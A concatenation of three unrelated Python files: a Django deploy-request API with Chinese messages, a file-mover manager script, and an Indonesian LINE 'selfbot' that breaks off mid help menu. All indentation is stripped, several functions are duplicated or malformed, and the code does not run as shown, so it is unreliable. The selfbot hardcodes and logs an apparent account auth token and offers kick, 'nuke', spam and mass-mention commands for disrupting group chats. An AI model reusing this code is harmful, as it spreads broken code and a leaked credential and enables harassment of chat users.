from django.db.models import F
from django.conf import settings
from django_redis import get_redis_connection
from libs import json_response, JsonParser, Argument, human_datetime, human_time
from apps.deploy.models import DeployRequest
from apps.app.models import Deploy
from apps.deploy.utils import deploy_dispatch
from apps.host.models import Host
from threading import Thread
from datetime import datetime
import json
import uuid
class RequestView(View):
def get(self, request):
data, query = [], {}
if not request.user.is_supper:
perms = request.user.deploy_perms
query['deploy__app_id__in'] = perms['apps']
query['deploy__env_id__in'] = perms['envs']
for item in DeployRequest.objects.filter(**query).annotate(
env_id=F('deploy__env_id'),
env_name=F('deploy__env__name'),
app_id=F('deploy__app_id'),
app_name=F('deploy__app__name'),
app_host_ids=F('deploy__host_ids'),
app_extend=F('deploy__extend'),
created_by_user=F('created_by__nickname')):
tmp = item.to_dict()
tmp['env_id'] = item.env_id
tmp['env_name'] = item.env_name
tmp['app_id'] = item.app_id
tmp['app_name'] = item.app_name
tmp['app_extend'] = item.app_extend
tmp['extra'] = json.loads(item.extra)
tmp['host_ids'] = json.loads(item.host_ids)
tmp['app_host_ids'] = json.loads(item.app_host_ids)
tmp['status_alias'] = item.get_status_display()
tmp['created_by_user'] = item.created_by_user
data.append(tmp)
return json_response(data)
def post(self, request):
form, error = JsonParser(
Argument('id', type=int, required=False),
Argument('deploy_id', type=int, help='缺少必要参数'),
Argument('name', help='请输申请标题'),
Argument('extra', type=list, help='缺少必要参数'),
Argument('host_ids', type=list, filter=lambda x: len(x), help='请选择要部署的主机'),
Argument('desc', required=False),
).parse(request.body)
if error is None:
deploy = Deploy.objects.filter(pk=form.deploy_id).first()
if not deploy:
return json_response(error='未找到该发布配置')
form.status = '0' if deploy.is_audit else '1'
form.extra = json.dumps(form.extra)
form.host_ids = json.dumps(form.host_ids)
if form.id:
DeployRequest.objects.filter(pk=form.id).update(
created_by=request.user,
reason=None,
**form
)
else:
DeployRequest.objects.create(created_by=request.user, **form)
return json_response(error=error)
def put(self, request):
form, error = JsonParser(
Argument('id', type=int, help='缺少必要参数'),
Argument('action', filter=lambda x: x in ('check', 'do'), help='参数错误')
).parse(request.body)
if error is None:
req = DeployRequest.objects.filter(pk=form.id).first()
if not req:
return json_response(error='未找到指定发布申请')
pre_req = DeployRequest.objects.filter(
deploy_id=req.deploy_id,
type='1',
id__lt=req.id,
version__isnull=False).first()
if not pre_req:
return json_response(error='未找到该应用可以用于回滚的版本')
if form.action == 'check':
return json_response({'date': pre_req.created_at, 'name': pre_req.name})
DeployRequest.objects.create(
deploy_id=req.deploy_id,
name=f'{req.name} - 回滚',
type='2',
extra=pre_req.extra,
host_ids=req.host_ids,
status='0' if pre_req.deploy.is_audit else '1',
desc='自动回滚至该应用的上个版本',
version=pre_req.version,
created_by=request.user
)
return json_response(error=error)
def delete(self, request):
form, error = JsonParser(
Argument('id', type=int, help='缺少必要参数')
).parse(request.GET)
if error is None:
DeployRequest.objects.filter(pk=form.id, status__in=('0', '1', '-1')).delete()
return json_response(error=error)
class RequestDetailView(View):
def get(self, request, r_id):
req = DeployRequest.objects.filter(pk=r_id).first()
if not req:
return json_response(error='未找到指定发布申请')
hosts = Host.objects.filter(id__in=json.loads(req.host_ids))
targets = [{'id': x.id, 'title': f'{x.name}({x.hostname}:{x.port})'} for x in hosts]
server_actions, host_actions, outputs = [], [], []
if req.deploy.extend == '2':
server_actions = json.loads(req.deploy.extend_obj.server_actions)
host_actions = json.loads(req.deploy.extend_obj.host_actions)
if request.GET.get('log'):
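            # Page through the Redis list holding the deploy log, 10 entries at a time,
            # until lrange returns nothing.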
rds, key, counter = get_redis_connection(), f'{settings.REQUEST_KEY}:{r_id}', 0
data = rds.lrange(key, counter, counter + 9)
while data:
counter += 10
outputs.extend(x.decode() for x in data)
data = rds.lrange(key, counter, counter + 9)
return json_response({
'app_name': req.deploy.app.name,
'env_name': req.deploy.env.name,
'status': req.status,
'type': req.type,
'status_alias': req.get_status_display(),
'targets': targets,
'server_actions': server_actions,
'host_actions': host_actions,
'outputs': outputs
})
def post(self, request, r_id):
query = {'pk': r_id}
if not request.user.is_supper:
perms = request.user.deploy_perms
query['deploy__app_id__in'] = perms['apps']
query['deploy__env_id__in'] = perms['envs']
req = DeployRequest.objects.filter(**query).first()
if not req:
return json_response(error='未找到指定发布申请')
if req.status not in ('1', '-3'):
return json_response(error='该申请单当前状态还不能执行发布')
hosts = Host.objects.filter(id__in=json.loads(req.host_ids))
token = uuid.uuid4().hex
outputs = {str(x.id): {'data': ''} for x in hosts}
outputs.update(local={'data': f'{human_time()} 建立接连... '})
req.status = '2'
if not req.version:
req.version = f'{req.deploy_id}_{req.id}_{datetime.now().strftime("%Y%m%d%H%M%S")}'
req.save()
Thread(target=deploy_dispatch, args=(request, req, token)).start()
return json_response({'token': token, 'type': req.type, 'outputs': outputs})
def patch(self, request, r_id):
form, error = JsonParser(
Argument('reason', required=False),
Argument('is_pass', type=bool, help='参数错误')
).parse(request.body)
if error is None:
req = DeployRequest.objects.filter(pk=r_id).first()
if not req:
return json_response(error='未找到指定申请')
if not form.is_pass and not form.reason:
return json_response(error='请输入驳回原因')
if req.status != '0':
return json_response(error='该申请当前状态不允许审核')
req.approve_at = human_datetime()
req.approve_by = request.user
req.status = '1' if form.is_pass else '-1'
req.reason = form.reason
req.save()
return json_response(error=error)
|
manager.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:set ts=4 sw=4 et:
# Copyright 2018-2019 Artem Smirnov
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os.path
import time
from threading import Thread
from queue import Queue
from fnmatch import fnmatch
from json_array import JsonArray
from smart_buffer import SmartBuffer
from mover import Mover
from logger import get_logger
from gui import QtWidgets, MainWindowApp
from main_logic import *
def main():
if len(sys.argv) != 2:
print("Error 4. Doesn't have path to the config-file as argument")
exit(1)
else:
config_path = sys.argv[1]
worker_data = {}
if os.path.exists(os.path.dirname(config_path)):
try:
import json
with open(config_path, 'r') as infile:
worker_data = json.load(infile)
except IOError as ex:
if ex.errno == 2:
print("Error 1. The config file doesn't exist")
exit(1)
except ValueError as ex:
print("Error 2. Incorrect Json in the config file: " + str(ex))
exit(1)
else:
print("Error 3. The config file doesn't exist")
exit(1)
if worker_data["gui"]:
        # apparently more than one worker cannot be launched as a separate process!
# https://pythonworld.ru/osnovy/instrukciya-if-elif-else-proverka-istinnosti-trexmestnoe-vyrazhenie-ifelse.html
# A = Y if X else Z
        app = QtWidgets.QApplication(sys.argv)  # new QApplication instance
global window
        window = MainWindowApp()  # create the main window object
        window.show()  # show the window
# create_threads(1, finder, db, source, target, worker_data["finder"]["search_interval"], worker_data["finder"]["mkdir_interval"], wq, worker_data["rules"]["include"], worker_data["rules"]["exclude"], worker_data["db"]["key"], worker_data["db"]["default_record"], logger)
# create_threads(worker_data["mover_count"], mover, target, source, wq, logger)
        app.exec_()  # and run the application
return 0
else:
if worker_data["enable"]:
logger = get_logger(worker_data["name"], worker_data["logger"]["log_level"], worker_data["logger"]["console_output"], worker_data["logger"]["log_path"])
db = JsonArray(worker_data["db_backup"]["db_path"], worker_data["db_backup"]["autosave_interval"], logger)
wq = Queue()
for record in db:
if not record['downloaded'] or not record['uploaded'] or not record['dropped']: wq.put(record)
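            # The source and target devices are loaded dynamically: the configured "device" string
            # names both the module and the class inside it, and the "args" dict (with the logger
            # injected) is passed to that class's constructor.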
m1 = __import__(worker_data["source"]["device"])
worker_data["source"]["args"]["logger"] = logger
source = getattr(m1, worker_data["source"]["device"])(**worker_data["source"]["args"])
m2 = __import__(worker_data["target"]["device"])
worker_data["target"]["args"]["logger"] = logger
target = getattr(m2, worker_data["target"]["device"])(**worker_data["target"]["args"])
def create_threads(count, function, *args):
for i in range(count):
t = Thread(target=function, args=(i+1, args,))
t.daemon = True
t.start()
window = None
create_threads(1, finder, window, db, source, target, worker_data["finder"]["search_interval"], worker_data["finder"]["mkdir_interval"], wq, worker_data["rules"]["include"], worker_data["rules"]["exclude"], worker_data["db"]["key"], worker_data["db"]["default_record"], logger)
create_threads(worker_data["mover_count"], mover, window, target, source, wq, logger)
try:
while True:
time.sleep(10)
except KeyboardInterrupt:
# del db
# smart_buffer.dump()
return 0
if __name__ == '__main__':
main()
|
sb.py
|
# -*- coding: utf-8 -*-
from linepy import *
from datetime import datetime
from time import sleep
from bs4 import BeautifulSoup
from gtts import gTTS
from humanfriendly import format_timespan, format_size, format_number, format_length
import time, random, sys, json, codecs, threading, glob, re, string, os, requests, subprocess, six, ast, pytz, urllib3, urllib, urllib.parse
from threading import Thread
from googletrans import Translator
#==============================================================================#
mulai = time.time()
line = LINE("EAmGeOOCWFuYq5gH8bS1.oFAdwbsxdvvicAIEyG/cGq.4CcoqqWUTLPAhrpniUfLNwiXEBCx0QFGxaM8rze5Gos=")
line.log("Auth Token : " + str(line.authToken))
line.log("Timeline Token : " + str(line.tl.channelAccessToken))
print ("Login succes ")
lineMID = line.profile.mid
lineProfile = line.getProfile()
lineSettings = line.getSettings()
oepoll = OEPoll(line)
welcome = []
responPc = []
autoRespon = []
autoResponImage = []
autoResponPm = []
msg_dict1 = {}
msg_dict = {}
#==============================================================================#
settings = {
"autoAdd": False,
"autoJoin": False,
"contact":False,
"autoblock": False,
"autoRespon": False,
"autoKick": False,
"diinvite": " terima kasih sudah invite saya",
"autoResponImage": False,
"autoResponPm": False,
"simiSimi": {},
"autoLeave": False,
"autojj": False,
"leavemsg": False,
"welcomemsg": False,
"responPc": False,
"keluar":"sᴇʟᴀᴍᴀᴛ ᴊᴀʟᴀɴ ....\nsᴇᴍᴏɢᴀ ᴋᴀᴍᴜ ʙᴀɪᴋ2 ᴅɪʟᴜᴀʀ sᴀɴᴀ\nsᴀᴍᴘᴀɪ ᴊᴜᴍᴘᴀ 👌👌👌",
"autoRead": False,
"protect": False,
"qrprotect": False,
"tag": "Iya, ada apa ka",
"tag2": "Ada apa kak tag saya",
"tag3": "Ada apasih ka Pm mulu",
"detectMention": False,
"autorejc": False,
"mention": "Sider mulu sini ka",
"welcome":"sᴇᴍᴏɢᴀ ʙᴇᴛᴀʜ ʏᴀ...\nsᴀʟᴀᴍ ᴋᴇɴᴀʟ ᴅᴀʀɪ sᴀʏᴀ 😘",
"responpc": "Tag terus",
"checkSticker": False,
"TagMention": False,
"TagMention2": False,
"unsendMessage":False,
"autoBalas": False,
'wellcome':False,
'bymsg':{},
"lang":"JP",
"autoJoinTicket": {},
"changeGroupPicture":True,
"Mute": True,
"changePicture": {},
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
],
"mimic": {
"copy": False,
"status": False,
"target": {}
}
}
wait = {
"Sider":{},
"limit": 1,
"Mute": False,
"unsend":True,
"timeline":False,
"selfbot":True,
"sukaPost":True,
"comment1":"» ʜᴇʏ, ɪᴍ ᴄᴏᴍᴍɪɴɢ 💃\n» ᴀᴜᴛᴏʟɪᴋᴇ ʙʏ: ᴛᴇᴀᴍ ᴅᴋᴢ ᴘʀᴏᴛᴇᴄᴛɪᴏɴ\n» ғᴀᴍɪʟʏ ʙᴏᴛs ᴘʀᴏᴛᴇᴄᴛ\n» ғᴀᴍɪʟʏ sᴇʟғʙᴏᴛ\n» ғᴀᴍɪʟʏ ᴊᴀᴠᴀsᴄʀɪғᴛ ʙᴏᴛ\n\n» ᴡᴇ ᴀʀᴇ ᴘʀᴏᴛᴇᴄᴛ ʏᴏᴜʀ ɢʀᴏᴜᴘ",
"welcomeOn":False,
"lang":"JP",
}
like = {
"like":True,
"likeOn":True,
"liked":True,
}
tikel = {
'sid':"48198",
'spkg':"2000000"
}
read = {
"readPoint": {},
"readMember": {},
"readTime": {},
"ROM": {}
}
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
cctv={
"cyduk":{},
"point":{},
"sidermem":{}
}
contact = line.getProfile()
mybackup = line.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
myProfile["displayName"] = lineProfile.displayName
myProfile["statusMessage"] = lineProfile.statusMessage
myProfile["pictureStatus"] = lineProfile.pictureStatus
#==============================================================================#
def restartBot():
print ("[ INFO ] BOT RESETTED")
time.sleep(3)
python = sys.executable
os.execl(python, python, *sys.argv)
def restart_program():
print ("[ INFO ] BOT RESETTED")
time.sleep(3)
python = sys.executable
os.execl(python, python, *sys.argv)
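# The MENTION contentMetadata used below is a JSON string of the form
#   {"MENTIONEES": [{"S": start, "E": end, "M": mid}, ...]}
# where S/E are the character offsets of the "@..." placeholder inside the message text
# and M is the mid of the user being mentioned.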
def sendMessageWithMention(to, mid):
try:
aa = '{"S":"0","E":"3","M":'+json.dumps(mid)+'}'
text_ = '@x '
line.sendMessage(to, text_, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
logError(error)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d : Jam, ♪ %02d : Menit, ♪ %02d : Detik ♪' % (hours, mins, secs)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours,24)
weaks, days = divmod(days,7)
if days == 0:
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
elif days > 0 and weaks == 0:
return '%02d Hari %02d Jam %02d Menit %02d Detik' %(days, hours, mins, secs)
elif days > 0 and weaks > 0:
return '%02d Minggu %02d Hari %02d Jam %02d Menit %02d Detik' %(weaks, days, hours, mins, secs)
def a2():
    now2 = datetime.now()  # 'datetime' is imported as the class, not the module
    nowT = datetime.strftime(now2, "%M")
    if nowT in ["10", "20", "30", "40", "50", "00"]:
return False
else:
return True
def sendMentionV2(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@zeroxyuuki "
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
line.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def mentionMembers(to, mid):
try:
arrData = ""
textx = "❨✪❩ ᴅᴋᴢ mentions ❨✪❩ \n\n1. ".format(str(len(mid)))
textx2 ="╭════════════════╮\n ✍ ᴛᴏᴛᴀʟ {} ᴍᴇᴍʙᴇʀs".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(line.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
line.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
jp1 = line.getContact(lineMID).displayName
line.sendMessage(to, textx2 + "\n ✍ ᴍᴇɴᴛɪᴏɴᴇs ʙʏ : " + jp1 + "\n╰════════════════╯")
except Exception as error:
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def mentionMembers(to, mid):
try:
arrData = ""
textx = "╭════════════════╮\n ❨✪❩ ᴅᴋᴢ mentions ❨✪❩ \n║\n║◍ 1. ".format(str(len(mid)))
ginfo = line.getGroup(to)
arr = []
no = 1
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "║◍ {}. ".format(str(no))
else:
textx += "\n「 Total {} Member 」\n╰════════════════╯".format(str(len(mid)))
line.sendMessage(to, textx, {'AGENT_NAME':'「 Creator 」', 'AGENT_LINK': 'line://ti/p/~eg_2'.format(line.getProfile().userid), 'AGENT_ICON': "http://dl.profile.line-cdn.net/" + line.getProfile().picturePath, 'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMentionV2(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@jeck "
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
line.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def sendMention(to, mid, firstmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x \n"
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,3,1)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = line.getAllContactIds()
gid = line.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
eltime = time.time() - mulai
bot = runtime(eltime)
text += mention+"◐ Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\n🔰 Group : "+str(len(gid))+"\n🔰 Teman : "+str(len(teman))+"\n🔰 Expired : In "+hari+"\n🔰 Version : Saints Bot\n🔰 Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\n🔰 Runtime : \n • "+bot
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def summon(to, nama):
aa = ""
bb = ""
strt = int(0)
akh = int(0)
nm = nama
myid = line.getProfile().mid
if myid in nm:
nm.remove(myid)
for mm in nm:
akh = akh + 6
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 7
akh = akh + 1
bb += "@nrik "
aa = (aa[:int(len(aa)-1)])
text = bb
try:
line.sendMessage(to, text, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
print(error)
def restartBot():
print ("[ INFO ] BOT RESETTED")
time.sleep(3)
python = sys.executable
os.execl(python, python, *sys.argv)
def logError(text):
line.log("[ ERROR ] " + str(text))
time_ = datetime.now()
with open("errorLog.txt","a") as error:
error.write("\n[%s] %s" % (str(time), text))
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version:
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else:
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1:
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+1)
end_content = s.find(',"ow"',start_content+1)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item)
time.sleep(0.1)
page = page[end_content:]
return items
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
#time.sleep(0.1) #Timer could be used to slow down the request for#image downloads
page = page[end_content:]
return items
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
#message.createdTime -> 00:00:00
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
#delete log if pass more than 24 hours
def delete_log1():
    from datetime import timedelta  # timedelta is not imported at module level
    for data in list(msg_dict1):  # copy the keys so entries can be deleted while iterating
        if (datetime.utcnow() - cTime_to_datetime(msg_dict1[data]["createdTime"])) > timedelta(1):
            del msg_dict1[data]
def atend1():
print("Saving")
with open("Log_data.json","w",encoding='utf8') as f:
json.dump(msg_dict1, f, ensure_ascii=False, indent=4,separators=(',', ': '))
print("BYE")
#message.createdTime -> 00:00:00
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
#delete log if pass more than 24 hours
def delete_log():
    from datetime import timedelta  # timedelta is not imported at module level
    for data in list(msg_dict):  # copy the keys so entries can be deleted while iterating
        if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > timedelta(1):
            del msg_dict[data]
def delete_log():
    from datetime import timedelta  # timedelta is not imported at module level
    for data in list(msg_dict):  # copy the keys so entries can be deleted while iterating
        if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > timedelta(1):
if "path" in msg_dict[data]:
line.deleteFile(msg_dict[data]["path"])
del msg_dict[data]
#atexit.register(atend)
def helpmessage():
helpMessage = """
╭═══════════════════╮
❨✪❩ ɢᴇɴᴇʀᴀʟ ᴄᴏᴍᴍᴀɴᴅ ❨✪❩
╰═══════════════════╯
01.║✍ ᴍᴇ
02.║✍ sᴘ
03.║✍ sᴇᴛ
04.║✍ ᴘᴘ
05.║✍ ɴᴋ:
06.║✍ ɢɪᴅ
07.║✍ ᴋɪᴄᴋ @
08.║✍ ᴠᴋɪᴄᴋ @
09.║✍ ɴᴜᴋᴇ
10.║✍ ɢᴜʀʟ
11.║✍ ʜᴇʟᴘ
12.║✍ ᴍɪᴅ
13.║✍ ᴍɪᴅ @
14.║✍ ᴍᴜsɪᴄ
15.║✍ ᴍᴏᴠɪᴇ
16.║✍ ʀᴇᴊᴇᴄᴛ
17.║✍ ᴄᴀɴᴄᴇʟ
18.║✍ ɢᴘɪᴄᴛ
19.║✍ ᴄᴏᴠᴇʀ
20.║✍ ᴘɪᴄᴛ @
21.║✍ ᴄᴏᴠᴇʀ @
22.║✍ ᴄᴏᴘʏ @
23.║✍ ɢᴄᴀʟʟ
24.║✍ sᴘᴀᴍ
25.║✍ ʙᴀᴄᴋᴜᴘ
26.║✍ ʏᴏᴜᴛᴜʙᴇ
27.║✍ ɪᴍᴀɢᴇ:
28.║✍ ɪɴsᴛᴀɢʀᴀᴍ
29.║✍ ᴋᴀʟᴋᴜʟᴀᴛᴏʀ
30.║✍ ʙʀᴏᴀᴅᴄᴀsᴛ
╭═══════════════════╮
❨✪❩ ʀᴇʟᴀᴛᴇᴅ ɢʀᴏᴜᴘ ❨✪❩
╰═══════════════════╯
31.║✍ ʀᴇʙᴏᴏᴛ
32.║✍ ʀᴜɴᴛɪᴍᴇ
33.║✍ ᴀʙᴏᴜᴛ
34.║✍ ᴄʀᴇᴀᴛᴏʀ
35.║✍ ᴍʏɴᴀᴍᴇ
36.║✍ ᴍʏʙɪᴏ
37.║✍ ᴍʏᴠɪᴅ
38.║✍ ɢᴇᴛʙɪᴏ @
39.║✍ ɢᴄʀᴇᴀᴛᴏʀ
40.║✍ ɢɴᴀᴍᴇ
41.║✍ ᴍᴇᴍʟɪsᴛ
42.║✍ ɢʀᴏᴜᴘs
43.║✍ ᴀᴜᴛᴏʟɪᴋᴇ
44.║✍ ʟɪɴᴋ ᴏɴ/ᴏғғ
45.║✍ ɢᴇᴛɴᴀᴍᴇ @
46.║✍ ᴜᴘᴅᴀᴛᴇ ᴘɪᴄᴛ
47.║✍ ɢᴇᴛ ᴄᴏɴᴛᴀᴄᴛ @
48.║✍ ʀᴇᴍᴏᴠᴇᴄʜᴀᴛ
49.║✍ ɢᴇᴛ ᴠɪᴅᴇᴏᴘʀᴏғɪʟᴇ
50.║✍ ᴜᴘᴅᴀᴛᴇ ᴘɪᴄᴛ ɢʀᴏᴜᴘ
51.║✍ ᴀʟʟsᴇᴛᴛɪɴɢs ᴍᴏᴅᴇ ᴏɴ
52.║✍ ᴀʟʟsᴇᴛᴛɪɴɢs ᴍᴏᴅᴇ ᴏғғ
53.║✍ ᴛᴀɢ /ʜɪ /ʜᴀɪ /ʜᴇᴍ /ᴅᴋᴢ
╭═══════════════════╮
❨✪❩ ᴍɪᴍɪᴄ ᴄᴏᴍᴍᴀɴᴅ ❨✪❩
╰═══════════════════╯
54.║✍ ᴍɪᴍɪᴄᴀᴅᴅ
55.║✍ ᴍɪᴍɪᴄᴅᴇʟ
56.║✍ ᴍɪᴍɪᴄʟɪsᴛ
57.║✍ ᴍɪᴍɪᴄ ᴏɴ/ᴏғғ
╭═══════════════════╮
❨✪❩ ᴍᴇᴅɪᴀ ᴄᴏᴍᴍᴀɴᴅ ❨✪❩
╰═══════════════════╯
58.║✍ ʟᴇᴅ (ᴛxᴛ)
59.║✍ ᴘᴏsᴛᴇʀ (ᴛxᴛ)
60.║✍ ғs (ᴛxᴛ)
61.║✍ ᴄᴏʙᴀ (ᴛxᴛ)
62.║✍ ᴀɴᴜ (ᴛxᴛ)
63.║✍ ᴍᴜsɪᴄ (ᴛxᴛ)
64.║✍ ᴋᴏɴᴛᴀᴋ ᴍᴇ
65.║✍ ɪɴғᴏ ᴍᴇ
66.║✍ sᴍᴜʟᴇ (ɪᴅsᴍᴜʟᴇ)
67.║✍ ᴄᴇᴋsᴍᴜʟᴇ (ɪᴅsᴍᴜʟᴇ)
╭═══════════════════╮
❨✪❩ sᴇᴛᴛɪɴɢ ɪɴ ʀᴇsᴘᴏɴ ❨✪❩
╰═══════════════════╯
68.║✍ sᴇᴛ ʀᴇsᴘᴏɴ1
69.║✍ ᴄᴇᴋ ʀᴇsᴘᴏɴ1
70.║✍ sᴇᴛ ʀᴇsᴘᴏɴ2
71.║✍ ᴄᴇᴋ ʀᴇsᴘᴏɴ2
72.║✍ sᴇᴛ ʀᴇsᴘᴏɴ3
73.║✍ ᴄᴇᴋ ʀᴇsᴘᴏɴ3
74.║✍ sᴇᴛ ʀᴇsᴘᴏɴᴘᴄ
75.║✍ ᴄᴇᴋ ʀᴇsᴘᴏɴᴘᴄ
76.║✍ sᴇᴛ ᴡᴇʟᴄᴏᴍᴇ
77.║✍ ᴄᴇᴋ ᴡᴇᴋᴄᴏᴍᴇ
78.║✍ sᴇᴛ ʟᴇᴀᴠᴇᴍsɢ
79.║✍ ᴄᴇᴋ ʟᴇᴀᴠᴇᴍsɢ
80.║✍ sᴇᴛ sɪᴅᴇʀᴛᴇxᴛ
